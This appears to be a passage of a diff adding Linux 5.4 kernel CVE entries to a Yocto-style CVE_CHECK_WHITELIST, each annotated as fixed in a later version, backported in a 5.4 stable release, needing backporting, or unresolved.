+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46976"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46977"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46978"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46979"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46980"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46981"
+
+# CVE-2021-46982 needs backporting (fixed from 5.13rc2)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46983"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46984"
+
+# fixed-version: only affects 5.12rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46985"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46986"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46987"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46988"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46989"
+
+# fixed-version: only affects 5.10rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46990"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46991"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46992"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46993"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46994"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46995"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46996"
+
+# fixed-version: only affects 5.10rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46997"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46998"
+
+# fixed-version: only affects 5.7rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46999"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47000"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47001"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47002"
+
+# fixed-version: only affects 5.11 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47003"
+
+# CVE-2021-47004 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-47005 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-47006"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47007"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47009"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47010"
+
+# fixed-version: only affects 5.11rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47011"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47012"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47013"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47014"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47015"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47016"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47017"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47018"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47019"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47020"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47021"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47022"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47023"
+
+# CVE-2021-47024 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47025"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47026"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47027"
+
+# CVE-2021-47028 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47029"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47030"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47031"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47032"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47034"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47035"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47036"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47037"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47038"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47039"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47040"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47041"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47042"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47043"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47044"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47045"
+
+# CVE-2021-47046 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47047"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47048"
+
+# CVE-2021-47049 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47050"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47051"
+
+# CVE-2021-47052 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47053"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47054"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47055"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47056"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47057"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47058"
+
+# CVE-2021-47059 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47060"
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47061"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47062"
+
+# CVE-2021-47063 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47064"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47065"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47066"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47067"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47069"
+
+# CVE-2021-47070 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47071"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47072"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47073"
+
+# CVE-2021-47074 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47075 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47076 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47077 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47078"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47079"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47080"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47081"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-47082"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47083"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47086"
+
+# fixed-version: only affects 5.14rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47087"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47088"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47089"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47090"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47091"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47092"
+
+# fixed-version: only affects 5.9 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47093"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47094"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47095"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47096"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47097"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47098"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47099"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47100"
+
+# CVE-2021-47101 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47102"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2021-47103"
+
+# fixed-version: only affects 5.15 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47104"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47105"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47106"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47107"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47108"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47109"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47110"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47111"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47112"
+
+# CVE-2021-47113 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47114"
+
+# CVE-2021-47116 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47117"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47118"
+
+# CVE-2021-47119 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47120"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47121"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47122"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47123"
+
+# CVE-2021-47124 needs backporting (fixed from 5.13rc2)
+
+# CVE-2021-47125 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47126"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47127"
+
+# CVE-2021-47128 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47129"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47130"
+
+# CVE-2021-47131 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47132"
+
+# CVE-2021-47133 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47134"
+
+# CVE-2021-47135 needs backporting (fixed from 5.13rc5)
+
+# CVE-2021-47136 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47137"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47138"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47139"
+
+# CVE-2021-47140 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47141"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47142"
+
+# CVE-2021-47143 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47144"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47146"
+
+# CVE-2021-47147 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47148"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47149"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47150"
+
+# CVE-2021-47151 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47152"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47153"
+
+# CVE-2021-47158 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47159"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47160"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47161"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47162"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47163"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47164"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47165"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47166"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47167"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47168"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47169"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47170"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47171"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47172"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47173"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47174"
+
+# CVE-2021-47175 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47176"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47177"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47178"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47179"
+
+# cpe-stable-backport: Backported in 5.4.123
+CVE_CHECK_WHITELIST += "CVE-2021-47180"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0001"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0002"
+
+# CVE-2022-0168 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0171"
+
+# cpe-stable-backport: Backported in 5.4.173
+CVE_CHECK_WHITELIST += "CVE-2022-0185"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0264"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0286"
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2022-0322"
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-0330"
+
+# CVE-2022-0382 needs backporting (fixed from 5.16)
+
+# CVE-2022-0400 has no known resolution
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0433"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0435"
+
+# CVE-2022-0480 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0487"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-0492"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-0494"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0500"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0516"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-0617"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2022-0644"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0646"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0742"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2022-0812"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0847"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2022-0850"
+
+# fixed-version: only affects 5.17rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0854"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0995"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0998"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1011"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-1012"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1015"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-1016"
+
+# fixed-version: only affects 5.12rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1043"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1048"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-1055"
+
+# CVE-2022-1116 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1158"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1184"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2022-1195"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1198"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1199"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-1204"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1205"
+
+# CVE-2022-1247 has no known resolution
+
+# CVE-2022-1263 needs backporting (fixed from 5.18rc3)
+
+# CVE-2022-1280 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1353"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2022-1419"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-1462"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1508"
+
+# fixed-version: only affects 5.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1516"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1651"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1652"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1671"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2022-1678"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-1679"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1729"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1734"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1786"
+
+# CVE-2022-1789 needs backporting (fixed from 5.18)
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-1836"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1852"
+
+# fixed-version: only affects 5.17rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1882"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1943"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1966"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1973"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1974"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1975"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1976"
+
+# fixed-version: only affects 5.13rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1998"
+
+# cpe-stable-backport: Backported in 5.4.181
+CVE_CHECK_WHITELIST += "CVE-2022-20008"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2022-20132"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2022-20141"
+
+# CVE-2022-20148 needs backporting (fixed from 5.16rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20153"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2022-20154"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20158"
+
+# CVE-2022-20166 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20368"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-20369"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20409"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-20421"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-20422"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20423"
+
+# CVE-2022-20424 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2022-20565"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-20566"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2022-20567"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20568"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-20572"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2078"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21123"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21125"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21166"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2022-21385"
+
+# cpe-stable-backport: Backported in 5.4.197
